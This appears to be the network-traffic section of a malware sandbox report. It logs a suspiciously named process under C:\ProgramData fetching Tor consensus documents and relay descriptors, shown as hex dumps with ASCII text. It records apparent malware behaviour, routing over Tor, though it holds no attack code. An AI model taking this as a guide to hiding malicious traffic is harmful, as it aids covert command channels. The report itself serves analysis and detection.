20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 31 3a 31 34 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 34 35 42 43 20 39 39 31 37 20 46 37 45 31 20 33 37 37 30 20 37 33 36 42 20 42 46 46 43 20 32 32 45 36 20 46 31 37 30 20 45 31 34 45 20 31 36 45 43 0a 75 70 74 69 6d 65 20 31 32 39 37 39 34 0a 62 61 6e 64 77 69 64 74 68 20 32 30 34 38 30 30 30 20 34 30 39 36 30 30 30 20 32 33 35 34 36 36 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 35 35 45 35 42 33 38 32 30 38 46 33 42 35 34 43 39 34 36 36 33 42 44 41 34 42 42 41 39 45 41 34 36 38 38 39 35 33 20 46 6b 7a 77 47 61 56 66 32 64 33 57 75 4a 35 31 35 38 67 47 47 5a 38 49 46 6e 37 38 30 6c 70 48 34 55 42 48 47 51 52 6c 79 4b 6f 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 59 39 51 49 68 2f 79 69 58 64 4a 51 31 79 51 58 64 6a 53 6f 6e 68 54 6b 6a 41 67 58 4d 34 58 7a 6e 38 75 78 77 79 44 73 4e 7a 65 57 6a 31 54 5a 45 54 36 5a 57 5a 0a 6c 32 47 52 4b 41 4e 46 77 46 53 56 52 49 63 6d 69 34 33 75 75 63 54 69 43 7a 48 31 65 72 53 72 57 30 6b 52 4a 62 65 62 4a 65 4a 68 43 35 77 69 74 51 52 76 4a 49 63 6b 75 79 49 4f 74 37 30 64 0a 43 68 76 31 36 6b 77 55 4a 4d 69 63 7a 79 44 70 59 2f 77 37 5a 6c 32 76 43 6c 6a 59 69 6e 79 33 73 4b 57 42 70 58 41 35 5a 41 61 2b 79 4e 75 70 67 42 6e 35 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 42 46 39 45 44 68 4c 53
                          Data Ascii: router GalaxyNewsRadio 84.62.245.6 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUxAVbs1PI0VDEFUz55fRfxh+7MGNrA5t5aN3IesGfsUqxQAQAgBABBQHKwM8IGgQ9dK2R4NMgzsLz/onx3FQItuxRviMt6HWhSKcoj6ewElNnaP4YoESMzdmvsKUrrzYeLejw33pUH8qKCproA73Xm+dRyD8S2r6+FSrkvCwUuxtAkPA51bQU=-----END ED25519 CERT-----master-key-ed25519 QUBysDPCBoEPXStkeDTIM7C8/6J8dxUCLbsUb4jLeh0platform Tor 0.4.7.10 on OpenBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 01:14:47fingerprint 45BC 9917 F7E1 3770 736B BFFC 22E6 F170 E14E 16ECuptime 129794bandwidth 2048000 4096000 2354662extra-info-digest D555E5B38208F3B54C94663BDA4BBA9EA4688953 FkzwGaVf2d3WuJ5158gGGZ8IFn780lpH4UBHGQRlyKoonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALY9QIh/yiXdJQ1yQXdjSonhTkjAgXM4Xzn8uxwyDsNzeWj1TZET6ZWZl2GRKANFwFSVRIcmi43uucTiCzH1erSrW0kRJbebJeJhC5witQRvJIckuyIOt70dChv16kwUJMiczyDpY/w7Zl2vCljYiny3sKWBpXA5ZAa+yNupgBn5AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALBF9EDhLS


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          4192.168.2.349692131.188.40.18980C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:06.341257095 CET7OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 131.188.40.189
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:06.361409903 CET8INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:06 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Sun, 11 Dec 2022 09:00:00 GMT
                          Vary: X-Or-Diff-From-Consensus
                          Data Raw: 6e 65 74 77 6f 72 6b 2d 73 74 61 74 75 73 2d 76 65 72 73 69 6f 6e 20 33 0a 76 6f 74 65 2d 73 74 61 74 75 73 20 63 6f 6e 73 65 6e 73 75 73 0a 63 6f 6e 73 65 6e 73 75 73 2d 6d 65 74 68 6f 64 20 33 32 0a 76 61 6c 69 64 2d 61 66 74 65 72 20 32 30 32 32 2d 31 32 2d 31 31 20 30 38 3a 30 30 3a 30 30 0a 66 72 65 73 68 2d 75 6e 74 69 6c 20 32 30 32 32 2d 31 32 2d 31 31 20 30 39 3a 30 30 3a 30 30 0a 76 61 6c 69 64 2d 75 6e 74 69 6c 20 32 30 32 32 2d 31 32 2d 31 31 20 31 31 3a 30 30 3a 30 30 0a 76 6f 74 69 6e 67 2d 64 65 6c 61 79 20 33 30 30 20 33 30 30 0a 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 0a 73 65 72 76 65 72 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 0a 6b 6e 6f 77 6e 2d 66 6c 61 67 73 20 41 75 74 68 6f 72 69 74 79 20 42 61 64 45 78 69 74 20 45 78 69 74 20 46 61 73 74 20 47 75 61 72 64 20 48 53 44 69 72 20 4d 69 64 64 6c 65 4f 6e 6c 79 20 4e 6f 45 64 43 6f 6e 73 65 6e 73 75 73 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 53 74 61 6c 65 44 65 73 63 20 53 79 62 69 6c 20 56 32 44 69 72 20 56 61 6c 69 64 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 4c 69 6e 6b 3d 34 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 70 61 72 61 6d 73 20 43 69 72 63 75 69 74 50 72 69 6f 72 69 74 79 48 61 6c 66 6c 69 66 65 4d 73 65 63 3d 33 30 30 30 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 42 75 72 73 74 3d 36 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61
                          Data Ascii: network-status-version 3vote-status consensusconsensus-method 32valid-after 2022-12-11 08:00:00fresh-until 2022-12-11 09:00:00valid-until 2022-12-11 11:00:00voting-delay 300 300client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Validrecommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCrea
                          Dec 11, 2022 09:25:06.361454964 CET9INData Raw: 74 69 6f 6e 45 6e 61 62 6c 65 64 3d 31 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 4d 69 6e 43 6f 6e 6e 65 63 74 69 6f 6e 73 3d 32 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 52 61 74 65 3d 32 20 44 6f 53 43 6f 6e 6e 65
                          Data Ascii: tionEnabled=1 DoSCircuitCreationMinConnections=2 DoSCircuitCreationRate=2 DoSConnectionEnabled=1 DoSConnectionMaxConcurrentCount=50 DoSRefuseSingleHopClientRendezvous=1 ExtendByEd25519ID=1 KISTSchedRunInterval=2 NumNTorsPerTAP=100 UseOptimisti
                          Dec 11, 2022 09:25:06.361498117 CET10INData Raw: 65 5f 70 65 72 63 65 6e 74 3d 35 30 30 20 73 65 6e 64 6d 65 5f 65 6d 69 74 5f 6d 69 6e 5f 76 65 72 73 69 6f 6e 3d 31 0a 73 68 61 72 65 64 2d 72 61 6e 64 2d 70 72 65 76 69 6f 75 73 2d 76 61 6c 75 65 20 38 20 4f 55 58 73 33 33 5a 36 6a 77 43 61 43
                          Data Ascii: e_percent=500 sendme_emit_min_version=1shared-rand-previous-value 8 OUXs33Z6jwCaC7+01M0edsV3bfQTozE0XT1G+S9nMBM=shared-rand-current-value 8 zXIuCMixcVdQiw7MqOKRh96/AoG3SQusUgMfgw4Gezk=dir-source dannenberg 0232AF901C31A04EE9848595AF9BB7620D
                          Dec 11, 2022 09:25:06.361545086 CET11INData Raw: 36 36 2e 33 33 2e 34 35 20 38 30 20 34 34 33 0a 63 6f 6e 74 61 63 74 20 65 6d 61 69 6c 3a 75 73 75 72 61 5b 5d 73 61 62 6f 74 61 67 65 2e 6f 72 67 20 75 72 6c 3a 68 74 74 70 73 3a 2f 2f 33 38 36 62 73 64 2e 6e 65 74 20 70 72 6f 6f 66 3a 75 72 69
                          Data Ascii: 66.33.45 80 443contact email:usura[]sabotage.org url:https://386bsd.net proof:uri-rsa abuse:abuse[]sabotage.net twitter:adejoode ciissversion:2vote-digest 69686C901A02C875F25F646E9DE068CADA61BFB9dir-source gabelmoo ED03BB616EB2F60BEC8015111
                          Dec 11, 2022 09:25:06.361588955 CET13INData Raw: 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 77 20 42 61 6e 64 77 69 64 74 68 3d 33 31 30 30 30 0a 70 20 61 63 63 65 70 74 20 32 30 2d 32 33 2c 34 33 2c 35 33 2c 37 39 2d 38 31 2c 38 38 2c 31 31 30 2c 31 34 33 2c 31 39 34 2c 32 32 30 2c 33
                          Data Ascii: ding=2 Relay=1-4w Bandwidth=31000p accept 20-23,43,53,79-81,88,110,143,194,220,389,443,464,531,543-544,554,563,636,706,749,873,902-904,981,989-995,1194,1220,1293,1500,1533,1677,1723,1755,1863,2082-2083,2086-2087,2095-2096,2102-2104,3128,3389
                          Dec 11, 2022 09:25:06.361632109 CET14INData Raw: 76 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 0a 70 72 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53
                          Data Ascii: v Tor 0.4.7.11pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=11000p reject 1-65535r suominode AFYmkM8z9TfE9MlYdlX3Rphoxzo St+sEFoocvWpEPAG1fBXF
                          Dec 11, 2022 09:25:06.361675024 CET15INData Raw: 20 5b 32 61 30 33 3a 65 36 30 30 3a 31 30 30 3a 3a 37 33 5d 3a 38 30 38 30 0a 73 20 45 78 69 74 20 46 61 73 74 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 56 61 6c 69 64 0a 76 20 54 6f 72 20 30 2e 34 2e 38 2e 30 2d 61 6c 70 68 61 2d 64 65 76
                          Data Ascii: [2a03:e600:100::73]:8080s Exit Fast Running Stable Validv Tor 0.4.8.0-alpha-devpr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=27000p accept 8
                          Dec 11, 2022 09:25:06.361717939 CET17INData Raw: 4d 70 4f 73 50 77 4c 6e 4b 7a 4e 73 6a 64 6b 4d 51 20 32 30 32 32 2d 31 32 2d 31 30 20 32 30 3a 34 36 3a 30 32 20 31 39 39 2e 32 34 39 2e 32 33 30 2e 31 30 33 20 34 34 33 20 30 0a 61 20 5b 32 36 32 30 3a 37 3a 36 30 30 31 3a 3a 31 30 33 5d 3a 38
                          Data Ascii: MpOsPwLnKzNsjdkMQ 2022-12-10 20:46:02 199.249.230.103 443 0a [2620:7:6001::103]:80s Exit Fast Guard HSDir Running Stable V2Dir Validv Tor 0.4.7.10pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth
                          Dec 11, 2022 09:25:06.361759901 CET18INData Raw: 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20
                          Data Ascii: =1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=24000p accept 20-21,43,53,79-81,88,110,143,220,389,443,464,531,543-544,554,636,706,749,873,902-904,981,989-993,995,1194,1220,1293,1500,153
                          Dec 11, 2022 09:25:06.361803055 CET19INData Raw: 2e 37 2e 37 0a 70 72 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c
                          Data Ascii: .7.7pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=110p reject 1-65535r effiorg1984 AMzmqE5tY6GkLhBYObyO1dSxZmk 8OYcUi8kTKuY2BCX2ZaZN/s9v9w 202
                          Dec 11, 2022 09:25:06.381867886 CET21INData Raw: 33 20 35 2e 39 2e 35 36 2e 32 34 39 20 34 30 38 30 20 30 0a 61 20 5b 32 61 30 31 3a 34 66 38 3a 31 36 31 3a 35 32 63 62 3a 3a 32 5d 3a 34 30 38 30 0a 73 20 46 61 73 74 20 48 53 44 69 72 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 56 32 44 69
                          Data Ascii: 3 5.9.56.249 4080 0a [2a01:4f8:161:52cb::2]:4080s Fast HSDir Running Stable V2Dir Validv Tor 0.4.7.10pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Band


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          40192.168.2.34974584.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:42.918173075 CET7845OUTGET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:42.964994907 CET7848INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:28 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:28 GMT
                          Data Raw: 72 6f 75 74 65 72 20 54 79 6b 52 65 6c 61 79 30 32 20 39 35 2e 32 31 36 2e 31 30 31 2e 32 34 37 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 72 41 55 32 49 64 6d 61 4e 62 69 6d 47 58 76 61 35 4e 53 6f 72 42 36 6a 7a 6b 4c 37 77 4d 62 36 6c 57 71 49 57 63 35 2f 74 37 37 4e 57 41 51 41 67 42 41 44 4f 35 49 68 73 0a 61 79 4f 70 57 69 31 62 2f 68 67 65 55 51 74 4b 63 51 34 78 4f 4b 66 79 57 6f 56 4f 54 64 70 2f 39 74 78 33 77 4b 77 55 76 77 47 6a 6c 64 4c 39 49 72 7a 50 77 66 62 76 68 4e 4b 37 30 35 69 47 0a 72 78 79 78 6c 2b 66 4d 69 67 47 4b 54 74 39 30 78 6f 44 76 76 46 51 31 50 51 6f 4a 2b 4b 2b 35 42 78 50 48 54 33 71 49 4d 2f 32 50 73 65 44 41 6a 47 44 35 4e 4b 76 65 35 67 41 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 7a 75 53 49 62 47 73 6a 71 56 6f 74 57 2f 34 59 48 6c 45 4c 53 6e 45 4f 4d 54 69 6e 38 6c 71 46 54 6b 33 61 66 2f 62 63 64 38 41 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 31 3a 34 66 39 3a 32 62 3a 31 35 31 66 3a 39 35 3a 32 31 36 3a 31 30 31 3a 32 34 37 5d 3a 34 34 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 46 72 65 65 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 32 30 3a 34 37 3a 31 34 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 43 43 20 39 35 41 38 20 43 45 39 32 20 41 35 39 31 20 44 34 41 35 20 37 37 39 33 20 35 39 42 45 20 46 46 42 41 20 31 33 46 41 20 31 42 38 38 0a 75 70 74 69 6d 65 20 33 30 36 30 30 33 36 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 32 39 36 34 31 31 31 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 43 39 37 35 32 36 43 30 43 33 43 46 38 46 41 34 39 44 43 39 38 30 37 39 45 33 33 41 35 38 35 35 39 45 45 45 33 44 20 61 74 4d 42 48 32 52 33 36 36 72 76 5a 74 59 6c 71 6c 79 58 62 32 34 6c 37 4a 6f 62 47 44 69 35 4a 51 65 67 39 61 43 70 73 54 30 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 45 46 49 58 78 51 6c 6f 6f 73 51 54 69 48 52 32 48 33 42 76 31 77 4b 68 74 37 38 76 69 34 50 64 38 30 33 70 4e 32 6a 6b 6f 74 78 4c 77 74 66 46 4a 76 49 50 4a 78 0a 52 38 53 32 71 72 31 6a 55 53 6b 59 61 31 56 6b 31 52 52 70 6f 39 79 5a 50 6d 72 63 77 39 54 6d 6c 78 4d 78 75 34 55 4d 44 30 4e 58 6b 36 72 6e 77 61 5a 49 72 36 30 71 79 41 63 50 64 6e 70 34 0a 48 31 50 55 4b 54 77 4a 34 4b 75 6d 49 38 6b 37 34 69 6a 34 43 6c 52 62 38 6b 37 48 73 46 6b 51 6f 62 4a 31 43 2b 4d 61 59 56 53 68 53 32 37 66 49 49 6f 78 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67
                          Data Ascii: router TykRelay02 95.216.101.247 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUrAU2IdmaNbimGXva5NSorB6jzkL7wMb6lWqIWc5/t77NWAQAgBADO5IhsayOpWi1b/hgeUQtKcQ4xOKfyWoVOTdp/9tx3wKwUvwGjldL9IrzPwfbvhNK705iGrxyxl+fMigGKTt90xoDvvFQ1PQoJ+K+5BxPHT3qIM/2PseDAjGD5NKve5gA=-----END ED25519 CERT-----master-key-ed25519 zuSIbGsjqVotW/4YHlELSnEOMTin8lqFTk3af/bcd8Aor-address [2a01:4f9:2b:151f:95:216:101:247]:443platform Tor 0.4.7.10 on FreeBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 20:47:14fingerprint 38CC 95A8 CE92 A591 D4A5 7793 59BE FFBA 13FA 1B88uptime 3060036bandwidth 1073741824 1073741824 29641114extra-info-digest D5C97526C0C3CF8FA49DC98079E33A58559EEE3D atMBH2R366rvZtYlqlyXb24l7JobGDi5JQeg9aCpsT0onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALEFIXxQloosQTiHR2H3Bv1wKht78vi4Pd803pN2jkotxLwtfFJvIPJxR8S2qr1jUSkYa1Vk1RRpo9yZPmrcw9TmlxMxu4UMD0NXk6rnwaZIr60qyAcPdnp4H1PUKTwJ4KumI8k74ij4ClRb8k7HsFkQobJ1C+MaYVShS27fIIoxAgMBAAE=-----END RSA PUBLIC KEY-----signing


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          41192.168.2.34974684.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:43.300738096 CET7854OUTGET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:43.347373962 CET7855INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:28 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:28 GMT
                          Data Raw: 72 6f 75 74 65 72 20 47 61 6c 61 78 79 4e 65 77 73 52 61 64 69 6f 20 38 34 2e 36 32 2e 32 34 35 2e 36 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 78 41 56 62 73 31 50 49 30 56 44 45 46 55 7a 35 35 66 52 66 78 68 2b 37 4d 47 4e 72 41 35 74 35 61 4e 33 49 65 73 47 66 73 55 71 78 51 41 51 41 67 42 41 42 42 51 48 4b 77 0a 4d 38 49 47 67 51 39 64 4b 32 52 34 4e 4d 67 7a 73 4c 7a 2f 6f 6e 78 33 46 51 49 74 75 78 52 76 69 4d 74 36 48 57 68 53 4b 63 6f 6a 36 65 77 45 6c 4e 6e 61 50 34 59 6f 45 53 4d 7a 64 6d 76 73 0a 4b 55 72 72 7a 59 65 4c 65 6a 77 33 33 70 55 48 38 71 4b 43 70 72 6f 41 37 33 58 6d 2b 64 52 79 44 38 53 32 72 36 2b 46 53 72 6b 76 43 77 55 75 78 74 41 6b 50 41 35 31 62 51 55 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 51 55 42 79 73 44 50 43 42 6f 45 50 58 53 74 6b 65 44 54 49 4d 37 43 38 2f 36 4a 38 64 78 55 43 4c 62 73 55 62 34 6a 4c 65 68 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4f 70 65 6e 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 